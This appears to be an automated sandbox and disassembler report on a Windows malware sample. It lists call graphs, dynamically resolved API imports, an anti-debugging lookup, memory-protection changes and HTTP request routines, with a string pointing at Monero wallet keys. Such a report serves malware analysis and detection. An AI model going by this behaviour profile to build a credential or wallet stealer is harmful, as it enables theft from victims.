15876->15877 15878 6452c2 15877->15878 15879 65a9b0 4 API calls 15878->15879 15880 645303 15879->15880 15882 65a920 3 API calls 15880->15882 15881->15827 15883 64530a 15882->15883 15884 65a8a0 lstrcpy 15883->15884 15885 645313 15884->15885 15886 645329 InternetConnectA 15885->15886 15886->15862 15887 645359 HttpOpenRequestA 15886->15887 15889 6458b7 InternetCloseHandle 15887->15889 15890 6453b7 15887->15890 15889->15862 15891 65a9b0 4 API calls 15890->15891 15892 6453cb 15891->15892 15893 65a8a0 lstrcpy 15892->15893 15894 6453d4 15893->15894 15895 65a920 3 API calls 15894->15895 15896 6453f2 15895->15896 15897 65a8a0 
lstrcpy 15896->15897 15898 6453fb 15897->15898 15899 65a9b0 4 API calls 15898->15899 15900 64541a 15899->15900 15901 65a8a0 lstrcpy 15900->15901 15902 645423 15901->15902 15903 65a9b0 4 API calls 15902->15903 15904 645444 15903->15904 15905 65a8a0 lstrcpy 15904->15905 15906 64544d 15905->15906 15907 65a9b0 4 API calls 15906->15907 15908 64546e 15907->15908 15909 65a8a0 lstrcpy 15908->15909 16001 658ead CryptBinaryToStringA 16000->16001 16002 658ea9 16000->16002 16001->16002 16003 658ece GetProcessHeap RtlAllocateHeap 16001->16003 16002->15846 16003->16002 16004 658ef4 codecvt 16003->16004 16005 658f05 CryptBinaryToStringA 16004->16005 16005->16002 16009->15284 16252 649880 16010->16252 16012 6498e1 16012->15291 16014 65a740 lstrcpy 16013->16014 16187 65a740 lstrcpy 16186->16187 16188 650266 16187->16188 16189 658de0 2 API calls 16188->16189 16190 65027b 16189->16190 16191 65a920 3 API calls 16190->16191 16192 65028b 16191->16192 16193 65a8a0 lstrcpy 16192->16193 16194 650294 16193->16194 16195 65a9b0 4 API calls 16194->16195 16196 6502b8 16195->16196 16253 64988d 16252->16253 16256 646fb0 16253->16256 16255 6498ad codecvt 16255->16012 16259 646d40 16256->16259 16260 646d63 16259->16260 16274 646d59 16259->16274 16275 646530 16260->16275 16264 646dbe 16264->16274 16285 6469b0 16264->16285 16266 646e2a 16267 646ee6 VirtualFree 16266->16267 16269 646ef7 16266->16269 16266->16274 16267->16269 16268 646f41 16270 6589f0 2 API calls 16268->16270 16268->16274 16269->16268 16271 646f26 FreeLibrary 16269->16271 16272 646f38 16269->16272 16270->16274 16271->16269 16273 6589f0 2 API calls 16272->16273 16273->16268 16274->16255 16276 646542 16275->16276 16278 646549 16276->16278 16295 658a10 GetProcessHeap RtlAllocateHeap 16276->16295 16278->16274 16279 646660 16278->16279 16284 64668f VirtualAlloc 16279->16284 16281 646730 16282 646743 VirtualAlloc 16281->16282 16283 64673c 16281->16283 16282->16283 16283->16264 16284->16281 16284->16283 16286 6469c9 16285->16286 16287 6469d5 
16285->16287 16286->16287 16288 646a09 LoadLibraryA 16286->16288 16287->16266 16288->16287 16289 646a32 16288->16289 16292 646ae0 16289->16292 16296 658a10 GetProcessHeap RtlAllocateHeap 16289->16296 16291 646ba8 GetProcAddress 16291->16287 16291->16292 16292->16287 16292->16291 16293 6589f0 2 API calls 16293->16292 16294 646a8b 16294->16287 16294->16293 16295->16278 16296->16294

                              Control-flow Graph

                              control_flow_graph 660 659860-659874 call 659750 663 659a93-659af2 LoadLibraryA * 5 660->663 664 65987a-659a8e call 659780 GetProcAddress * 21 660->664 666 659af4-659b08 GetProcAddress 663->666 667 659b0d-659b14 663->667 664->663 666->667 668 659b46-659b4d 667->668 669 659b16-659b41 GetProcAddress * 2 667->669 671 659b4f-659b63 GetProcAddress 668->671 672 659b68-659b6f 668->672 669->668 671->672 673 659b71-659b84 GetProcAddress 672->673 674 659b89-659b90 672->674 673->674 675 659bc1-659bc2 674->675 676 659b92-659bbc GetProcAddress * 2 674->676 676->675
                              APIs
                              • GetProcAddress.KERNEL32(76210000,013D1630), ref: 006598A1
                              • GetProcAddress.KERNEL32(76210000,013D1540), ref: 006598BA
                              • GetProcAddress.KERNEL32(76210000,013D1558), ref: 006598D2
                              • GetProcAddress.KERNEL32(76210000,013D15B8), ref: 006598EA
                              • GetProcAddress.KERNEL32(76210000,013D16A8), ref: 00659903
                              • GetProcAddress.KERNEL32(76210000,013D8B38), ref: 0065991B
                              • GetProcAddress.KERNEL32(76210000,013C52B0), ref: 00659933
                              • GetProcAddress.KERNEL32(76210000,013C5310), ref: 0065994C
                              • GetProcAddress.KERNEL32(76210000,013D15D0), ref: 00659964
                              • GetProcAddress.KERNEL32(76210000,013D16D8), ref: 0065997C
                              • GetProcAddress.KERNEL32(76210000,013D16C0), ref: 00659995
                              • GetProcAddress.KERNEL32(76210000,013D1600), ref: 006599AD
                              • GetProcAddress.KERNEL32(76210000,013C5170), ref: 006599C5
                              • GetProcAddress.KERNEL32(76210000,013D1570), ref: 006599DE
                              • GetProcAddress.KERNEL32(76210000,013D1750), ref: 006599F6
                              • GetProcAddress.KERNEL32(76210000,013C5090), ref: 00659A0E
                              • GetProcAddress.KERNEL32(76210000,013D16F0), ref: 00659A27
                              • GetProcAddress.KERNEL32(76210000,013D1720), ref: 00659A3F
                              • GetProcAddress.KERNEL32(76210000,013C50B0), ref: 00659A57
                              • GetProcAddress.KERNEL32(76210000,013D17C8), ref: 00659A70
                              • GetProcAddress.KERNEL32(76210000,013C5050), ref: 00659A88
                              • LoadLibraryA.KERNEL32(013D1888,?,00656A00), ref: 00659A9A
                              • LoadLibraryA.KERNEL32(013D17E0,?,00656A00), ref: 00659AAB
                              • LoadLibraryA.KERNEL32(013D1870,?,00656A00), ref: 00659ABD
                              • LoadLibraryA.KERNEL32(013D1810,?,00656A00), ref: 00659ACF
                              • LoadLibraryA.KERNEL32(013D17F8,?,00656A00), ref: 00659AE0
                              • GetProcAddress.KERNEL32(75B30000,013D1828), ref: 00659B02
                              • GetProcAddress.KERNEL32(751E0000,013D1840), ref: 00659B23
                              • GetProcAddress.KERNEL32(751E0000,013D1858), ref: 00659B3B
                              • GetProcAddress.KERNEL32(76910000,013D8F30), ref: 00659B5D
                              • GetProcAddress.KERNEL32(75670000,013C50D0), ref: 00659B7E
                              • GetProcAddress.KERNEL32(77310000,013D8B88), ref: 00659B9F
                              • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00659BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00659BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: fe0348fa7b18d2a2399939c2d62f4dbc0cf84639863343ced39edd8a9e3597ed
                              • Instruction ID: b5b404f1dacbf9f6270988bdd232084e045c169245ad071c34310565ce20b910
                              • Opcode Fuzzy Hash: fe0348fa7b18d2a2399939c2d62f4dbc0cf84639863343ced39edd8a9e3597ed
                              • Instruction Fuzzy Hash: C5A12AB55002449FF34CEFACEE88A663BF9F74C701704452BA645D32E4D739A852EB62

                              Control-flow Graph

                              control_flow_graph 764 6445c0-644695 RtlAllocateHeap 781 6446a0-6446a6 764->781 782 6446ac-64474a 781->782 783 64474f-6447a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0064460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0064479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (30, one string referenced from 30 code locations): 006445C7, 006445D2, 006445DD, 006445E8, 006445F3, 00644617, 00644622, 0064462D, 00644638, 00644643, 00644657, 00644662, 0064466D, 00644678, 00644683, 006446AC, 006446B7, 006446C2, 006446CD, 006446D8, 00644713, 0064471E, 00644729, 00644734, 0064473F, 0064474F, 0064475A, 00644765, 00644770, 0064477B
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same sentence repeated 30 times, once per xref listed above)
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 9302a1a59fa3b3ab6568dc64b40edefd4973f1d69210432276beacb15f5f76f4
                              • Instruction ID: 0f751e28722541409fd3dcb82d276f9201d56b82c647f8c85362240c33671c82
                              • Opcode Fuzzy Hash: 9302a1a59fa3b3ab6568dc64b40edefd4973f1d69210432276beacb15f5f76f4
                              • Instruction Fuzzy Hash: E141F6747C268CFACF6CFBA4984FE9DBA777FCAB08F515044A80153282DFB069804566

                              Control-flow Graph

                              control_flow_graph 801 644880-644942 call 65a7a0 call 6447b0 call 65a740 * 5 InternetOpenA StrCmpCA 816 644944 801->816 817 64494b-64494f 801->817 816->817 818 644955-644acd call 658b60 call 65a920 call 65a8a0 call 65a800 * 2 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a920 call 65a8a0 call 65a800 * 2 InternetConnectA 817->818 819 644ecb-644ef3 InternetCloseHandle call 65aad0 call 649ac0 817->819 818->819 905 644ad3-644ad7 818->905 829 644ef5-644f2d call 65a820 call 65a9b0 call 65a8a0 call 65a800 819->829 830 644f32-644fa2 call 658990 * 2 call 65a7a0 call 65a800 * 8 819->830 829->830 906 644ae5 905->906 907 644ad9-644ae3 905->907 908 644aef-644b22 HttpOpenRequestA 906->908 907->908 909 644ebe-644ec5 InternetCloseHandle 908->909 910 644b28-644e28 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a9b0 call 65a8a0 call 65a800 call 65a920 call 65a8a0 call 65a800 call 65a740 call 65a920 * 2 call 65a8a0 call 65a800 * 2 call 65aad0 lstrlen call 65aad0 * 2 lstrlen call 65aad0 HttpSendRequestA 908->910 909->819 1021 644e32-644e5c InternetReadFile 910->1021 1022 644e67-644eb9 InternetCloseHandle call 65a800 1021->1022 1023 644e5e-644e65 1021->1023 1022->909 1023->1022 1024 644e69-644ea7 call 65a9b0 call 65a8a0 call 65a800 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                                • Part of subcall function 006447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00644915
                              • StrCmpCA.SHLWAPI(?,013DEC50), ref: 0064493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00644ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00660DDB,00000000,?,?,00000000,?,",00000000,?,013DEBC0), ref: 00644DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00644E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00644E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00644E49
                              • InternetCloseHandle.WININET(00000000), ref: 00644EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00644EC5
                              • HttpOpenRequestA.WININET(00000000,013DEBE0,?,013DE238,00000000,00000000,00400100,00000000), ref: 00644B15
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • InternetCloseHandle.WININET(00000000), ref: 00644ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
• Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: e45a2f1ae55beadcb9928d4a86f9389526d612104a7e14f92ec0bbd9c5345f3e
                              • Instruction ID: 5530563444ffbe4d9a9b848b56308594c121c6a5637759230aa9494d024f33c8
                              • Opcode Fuzzy Hash: e45a2f1ae55beadcb9928d4a86f9389526d612104a7e14f92ec0bbd9c5345f3e
                              • Instruction Fuzzy Hash: C012DB71911118AADB59EB90DC92FEEB37ABF14301F50429DB50662091EF702F4DCF6A
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006411B7), ref: 00657880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00657887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0065789F
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: aca896b47c1934556dc1c47ffd2261b6414a4df7b08bdfa683193b68126ff4dc
                              • Instruction ID: 89815684652d09f542500b2b5cb1d9d4f1159e10c9aee17d9725f2ae85d0bc5d
                              • Opcode Fuzzy Hash: aca896b47c1934556dc1c47ffd2261b6414a4df7b08bdfa683193b68126ff4dc
                              • Instruction Fuzzy Hash: 00F04FB1944208ABD714DF98DD49BAEBBB8FB04712F10026AFA05A26C0C77515048BA1
                              APIs
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 06426b75c0c8b991ff4acc6c8644277e78d08d9e37dc1c9c3cd59271ecd98b5c
                              • Instruction ID: 3611c7231c8aef5dc4a13c8ec505bad129a687db5690f9517d4af1f51071dbc8
                              • Opcode Fuzzy Hash: 06426b75c0c8b991ff4acc6c8644277e78d08d9e37dc1c9c3cd59271ecd98b5c
                              • Instruction Fuzzy Hash: FBD05E7490030CDBDB04EFE4D8496DDBB78FB08311F000595D90562380EA305481CBA6

Control-flow Graph (rendered graph omitted)
                              APIs
                              • GetProcAddress.KERNEL32(76210000,013C5110), ref: 00659C2D
                              • GetProcAddress.KERNEL32(76210000,013C5250), ref: 00659C45
                              • GetProcAddress.KERNEL32(76210000,013D8F90), ref: 00659C5E
                              • GetProcAddress.KERNEL32(76210000,013D9008), ref: 00659C76
                              • GetProcAddress.KERNEL32(76210000,013D8FA8), ref: 00659C8E
                              • GetProcAddress.KERNEL32(76210000,013DD7C8), ref: 00659CA7
                              • GetProcAddress.KERNEL32(76210000,013CA828), ref: 00659CBF
                              • GetProcAddress.KERNEL32(76210000,013DD630), ref: 00659CD7
                              • GetProcAddress.KERNEL32(76210000,013DD708), ref: 00659CF0
                              • GetProcAddress.KERNEL32(76210000,013DD690), ref: 00659D08
                              • GetProcAddress.KERNEL32(76210000,013DD7E0), ref: 00659D20
                              • GetProcAddress.KERNEL32(76210000,013C5130), ref: 00659D39
                              • GetProcAddress.KERNEL32(76210000,013C4FB0), ref: 00659D51
                              • GetProcAddress.KERNEL32(76210000,013C5030), ref: 00659D69
                              • GetProcAddress.KERNEL32(76210000,013C5150), ref: 00659D82
                              • GetProcAddress.KERNEL32(76210000,013DD768), ref: 00659D9A
                              • GetProcAddress.KERNEL32(76210000,013DD6F0), ref: 00659DB2
                              • GetProcAddress.KERNEL32(76210000,013CA800), ref: 00659DCB
                              • GetProcAddress.KERNEL32(76210000,013C5190), ref: 00659DE3
                              • GetProcAddress.KERNEL32(76210000,013DD660), ref: 00659DFB
                              • GetProcAddress.KERNEL32(76210000,013DD780), ref: 00659E14
                              • GetProcAddress.KERNEL32(76210000,013DD720), ref: 00659E2C
                              • GetProcAddress.KERNEL32(76210000,013DD6D8), ref: 00659E44
                              • GetProcAddress.KERNEL32(76210000,013C5350), ref: 00659E5D
                              • GetProcAddress.KERNEL32(76210000,013DD738), ref: 00659E75
                              • GetProcAddress.KERNEL32(76210000,013DD648), ref: 00659E8D
                              • GetProcAddress.KERNEL32(76210000,013DD750), ref: 00659EA6
                              • GetProcAddress.KERNEL32(76210000,013DD798), ref: 00659EBE
                              • GetProcAddress.KERNEL32(76210000,013DD6A8), ref: 00659ED6
                              • GetProcAddress.KERNEL32(76210000,013DD7B0), ref: 00659EEF
                              • GetProcAddress.KERNEL32(76210000,013DD6C0), ref: 00659F07
                              • GetProcAddress.KERNEL32(76210000,013DD678), ref: 00659F1F
                              • GetProcAddress.KERNEL32(76210000,013DD1F8), ref: 00659F38
                              • GetProcAddress.KERNEL32(76210000,013D0298), ref: 00659F50
                              • GetProcAddress.KERNEL32(76210000,013DD270), ref: 00659F68
                              • GetProcAddress.KERNEL32(76210000,013DD318), ref: 00659F81
                              • GetProcAddress.KERNEL32(76210000,013C51D0), ref: 00659F99
                              • GetProcAddress.KERNEL32(76210000,013DD258), ref: 00659FB1
                              • GetProcAddress.KERNEL32(76210000,013C5210), ref: 00659FCA
                              • GetProcAddress.KERNEL32(76210000,013DD0D8), ref: 00659FE2
                              • GetProcAddress.KERNEL32(76210000,013DD150), ref: 00659FFA
                              • GetProcAddress.KERNEL32(76210000,013C5290), ref: 0065A013
                              • GetProcAddress.KERNEL32(76210000,013C5330), ref: 0065A02B
                              • LoadLibraryA.KERNEL32(013DD288,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A03D
                              • LoadLibraryA.KERNEL32(013DD030,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A04E
                              • LoadLibraryA.KERNEL32(013DD2A0,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A060
                              • LoadLibraryA.KERNEL32(013DD048,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A072
                              • LoadLibraryA.KERNEL32(013DD198,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A083
                              • LoadLibraryA.KERNEL32(013DD2B8,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A095
                              • LoadLibraryA.KERNEL32(013DD1C8,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A0A7
                              • LoadLibraryA.KERNEL32(013DD2D0,?,00655CA3,00660AEB,?,?,?,?,?,?,?,?,?,?,00660AEA,00660AE3), ref: 0065A0B8
                              • GetProcAddress.KERNEL32(751E0000,013C52D0), ref: 0065A0DA
                              • GetProcAddress.KERNEL32(751E0000,013DD090), ref: 0065A0F2
                              • GetProcAddress.KERNEL32(751E0000,013D8AC8), ref: 0065A10A
                              • GetProcAddress.KERNEL32(751E0000,013DD2E8), ref: 0065A123
                              • GetProcAddress.KERNEL32(751E0000,013C52F0), ref: 0065A13B
                              • GetProcAddress.KERNEL32(73FC0000,013CA580), ref: 0065A160
                              • GetProcAddress.KERNEL32(73FC0000,013C5670), ref: 0065A179
                              • GetProcAddress.KERNEL32(73FC0000,013CA698), ref: 0065A191
                              • GetProcAddress.KERNEL32(73FC0000,013DD300), ref: 0065A1A9
                              • GetProcAddress.KERNEL32(73FC0000,013DD060), ref: 0065A1C2
                              • GetProcAddress.KERNEL32(73FC0000,013C5410), ref: 0065A1DA
                              • GetProcAddress.KERNEL32(73FC0000,013C53B0), ref: 0065A1F2
                              • GetProcAddress.KERNEL32(73FC0000,013DD078), ref: 0065A20B
                              • GetProcAddress.KERNEL32(753A0000,013C5550), ref: 0065A22C
                              • GetProcAddress.KERNEL32(753A0000,013C5470), ref: 0065A244
                              • GetProcAddress.KERNEL32(753A0000,013DD0A8), ref: 0065A25D
                              • GetProcAddress.KERNEL32(753A0000,013DD0C0), ref: 0065A275
                              • GetProcAddress.KERNEL32(753A0000,013C5510), ref: 0065A28D
                              • GetProcAddress.KERNEL32(76310000,013CA850), ref: 0065A2B3
                              • GetProcAddress.KERNEL32(76310000,013CA468), ref: 0065A2CB
                              • GetProcAddress.KERNEL32(76310000,013DD1E0), ref: 0065A2E3
                              • GetProcAddress.KERNEL32(76310000,013C5490), ref: 0065A2FC
                              • GetProcAddress.KERNEL32(76310000,013C5570), ref: 0065A314
                              • GetProcAddress.KERNEL32(76310000,013CA508), ref: 0065A32C
                              • GetProcAddress.KERNEL32(76910000,013DD0F0), ref: 0065A352
                              • GetProcAddress.KERNEL32(76910000,013C55B0), ref: 0065A36A
                              • GetProcAddress.KERNEL32(76910000,013D8AE8), ref: 0065A382
                              • GetProcAddress.KERNEL32(76910000,013DD108), ref: 0065A39B
                              • GetProcAddress.KERNEL32(76910000,013DD120), ref: 0065A3B3
                              • GetProcAddress.KERNEL32(76910000,013C53F0), ref: 0065A3CB
                              • GetProcAddress.KERNEL32(76910000,013C5430), ref: 0065A3E4
                              • GetProcAddress.KERNEL32(76910000,013DD138), ref: 0065A3FC
                              • GetProcAddress.KERNEL32(76910000,013DD210), ref: 0065A414
                              • GetProcAddress.KERNEL32(75B30000,013C5450), ref: 0065A436
                              • GetProcAddress.KERNEL32(75B30000,013DD168), ref: 0065A44E
                              • GetProcAddress.KERNEL32(75B30000,013DD180), ref: 0065A466
                              • GetProcAddress.KERNEL32(75B30000,013DD228), ref: 0065A47F
                              • GetProcAddress.KERNEL32(75B30000,013DD1B0), ref: 0065A497
                              • GetProcAddress.KERNEL32(75670000,013C5690), ref: 0065A4B8
                              • GetProcAddress.KERNEL32(75670000,013C5390), ref: 0065A4D1
                              • GetProcAddress.KERNEL32(76AC0000,013C54B0), ref: 0065A4F2
                              • GetProcAddress.KERNEL32(76AC0000,013DD240), ref: 0065A50A
                              • GetProcAddress.KERNEL32(6F4D0000,013C55D0), ref: 0065A530
                              • GetProcAddress.KERNEL32(6F4D0000,013C5610), ref: 0065A548
                              • GetProcAddress.KERNEL32(6F4D0000,013C5630), ref: 0065A560
                              • GetProcAddress.KERNEL32(6F4D0000,013DD558), ref: 0065A579
                              • GetProcAddress.KERNEL32(6F4D0000,013C54D0), ref: 0065A591
                              • GetProcAddress.KERNEL32(6F4D0000,013C56B0), ref: 0065A5A9
                              • GetProcAddress.KERNEL32(6F4D0000,013C56D0), ref: 0065A5C2
                              • GetProcAddress.KERNEL32(6F4D0000,013C53D0), ref: 0065A5DA
                              • GetProcAddress.KERNEL32(6F4D0000,InternetSetOptionA), ref: 0065A5F1
                              • GetProcAddress.KERNEL32(6F4D0000,HttpQueryInfoA), ref: 0065A607
                              • GetProcAddress.KERNEL32(75AE0000,013DD618), ref: 0065A629
                              • GetProcAddress.KERNEL32(75AE0000,013D8A98), ref: 0065A641
                              • GetProcAddress.KERNEL32(75AE0000,013DD360), ref: 0065A659
                              • GetProcAddress.KERNEL32(75AE0000,013DD588), ref: 0065A672
                              • GetProcAddress.KERNEL32(76300000,013C55F0), ref: 0065A693
                              • GetProcAddress.KERNEL32(6FE10000,013DD4F8), ref: 0065A6B4
                              • GetProcAddress.KERNEL32(6FE10000,013C54F0), ref: 0065A6CD
                              • GetProcAddress.KERNEL32(6FE10000,013DD480), ref: 0065A6E5
                              • GetProcAddress.KERNEL32(6FE10000,013DD390), ref: 0065A6FD
                              Strings
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: HttpQueryInfoA$InternetSetOptionA
                              • API String ID: 2238633743-1775429166
                              • Opcode ID: eb4c7b92946a35639b15a86e62e1549b3765b84a41fd26caabb4c89598ff2d40
                              • Instruction ID: afc549038a25e7820900cf8aadb43d4430cae6f0d0cee5c55788fd42bce147c9
                              • Opcode Fuzzy Hash: eb4c7b92946a35639b15a86e62e1549b3765b84a41fd26caabb4c89598ff2d40
                              • Instruction Fuzzy Hash: AD621CB5500200AFF75CEFACED8896637F9F74C701714852BA649C32E4D739A852EB62

Control-flow Graph (rendered graph omitted)
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                                • Part of subcall function 006447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
